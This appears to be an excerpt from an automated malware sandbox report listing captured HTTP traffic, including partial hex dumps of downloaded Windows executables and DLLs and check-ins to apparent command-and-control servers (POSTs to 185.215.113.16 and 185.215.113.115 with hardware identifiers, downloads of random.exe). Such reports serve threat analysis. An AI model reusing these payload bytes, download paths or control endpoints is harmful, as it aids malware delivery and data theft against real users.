00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:08 GMTContent-Type: application/octet-streamContent-Length: 1895936Last-Modified: Sat, 01 Feb 2025 13:57:48 GMTConnection: keep-aliveETag: "679e285c-1cee00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 6e 4e 99 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 6a 04 00 00 ae 00 00 00 00 00 00 00 c0 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 4a 00 00 04 00 00 20 ac 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 05 00 6b 00 00 00 00 90 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 a1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 05 00 00 10 00 00 00 90 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 90 05 00 00 02 00 00 00 a0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 05 00 00 02 00 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 d0 2a 00 00 b0 05 00 00 02 00 00 00 a4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 7a 6f 6d 61 66 76 71 00 30 1a 00 00 80 30 00 00 22 1a 00 00 a6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 78 6d 67 76 79 6e 7a 00 10 00 00 00 b0 4a 00 00 04 00 00 00 c8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 c0 4a 00 00 22 00 00 00 cc 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:13 GMTContent-Type: application/octet-streamContent-Length: 3024384Last-Modified: Sat, 01 Feb 2025 16:14:01 GMTConnection: keep-aliveETag: "679e4849-2e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 2c 29 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b5 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 69 68 70 78 6a 79 75 00 10 2b 00 00 b0 06 00 00 0a 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 75 69 7a 65 61 74 00 10 00 00 00 c0 31 00 00 06 00 00 00 fe 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 04 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:16 GMTContent-Type: application/octet-streamContent-Length: 4508672Last-Modified: Mon, 20 Jan 2025 12:26:20 GMTConnection: keep-aliveETag: "678e40ec-44cc00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 75 5d 91 c9 31 3c ff 9a 31 3c ff 9a 31 3c ff 9a 43 bd fc 9b 3a 3c ff 9a 43 bd fa 9b be 3c ff 9a 43 bd fb 9b 22 3c ff 9a 20 ba fc 9b 25 3c ff 9a 20 ba fb 9b 23 3c ff 9a 20 ba fa 9b 1a 3c ff 9a 43 bd fe 9b 36 3c ff 9a 31 3c fe 9a b2 3c ff 9a b5 ba fb 9b 30 3c ff 9a b5 ba fd 9b 30 3c ff 9a 52 69 63 68 31 3c ff 9a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 80 39 8e 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 16 3e 00 00 c8 06 00 00 00 00 00 65 e3 1e 00 00 10 00 00 00 10 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 63 00 00 04 00 00 e1 51 45 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 02 5e 00 50 00 00 00 00 a0 5f 00 90 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 5e 00 e8 0c 01 00 08 97 5d 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 96 5d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 5e 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 62 73 73 20 b5 1e 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 e0 2e 74 65 78 74 00 00 00 dd 14 3e 00 00 d0 1e 00 00 16 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 1f cf 00 00 00 f0 5c 00 00 d0 00 00 00 1a 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 60 3f 00 00 00 c0 5d 00 00 2a 00 00 00 ea 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 8c 11 00 00 00 00 5e 00 00 12 00 00 00 14 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 73 76 63 6a 6d 63 c1 01 00 00 00 20 5e 00 00 02 00 00 00 26 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 66 70 74 61 62 6c 65 99 01 00 00 00 30 5e 00 00 02 00 00 00 28 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 87 5f 01 00 00 40 5e 00 00 60 01 00 00 2a 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 90 40 04 00 00 a0 5f 00 00 42 04 00 00 8a 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 01 Feb 2025 16:19:41 GMTContent-Type: application/octet-streamContent-Length: 3024384Last-Modified: Sat, 01 Feb 2025 16:14:01 GMTConnection: keep-aliveETag: "679e4849-2e2600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 d0 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 32 00 00 04 00 00 2c 29 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 a8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 b6 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f4 b5 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 a8 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 72 69 68 70 78 6a 79 75 00 10 2b 00 00 b0 06 00 00 0a 2b 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 66 72 75 69 7a 65 61 74 00 10 00 00 00 c0 31 00 00 06 00 00 00 fe 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 d0 31 00 00 22 00 00 00 04 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:19:51 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Feb 2025 16:19:51 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1502720Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 2f 14 00 00 20 00 00 00 30 14 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f0 b9 02 00 00 60 14 00 00 ba 02 00 00 32 14 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 17 00 00 02 00 00 00 ec 16 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4f 14 00 00 00 00 00 48 00 00 00 02 00 05 00 68 7e 00 00 b8 44 00 00 01 00 00 00 55 00 00 06 20 c3 00 00 10 8c 13 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 3d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 4d 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 b7 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 d9 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 eb 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 1f 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: global traffic	HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: /
Source: global traffic	HTTP traffic detected: GET /m08mbk HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 39 41 31 34 31 43 45 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8F9A141CEF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 37 35 38 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1017587001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAECFIJDAAAKECBFCGHIHost: 185.215.113.115Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 38 35 46 33 43 42 34 35 36 38 34 32 31 37 36 35 31 31 32 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 43 46 49 4a 44 41 41 41 4b 45 43 42 46 43 47 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 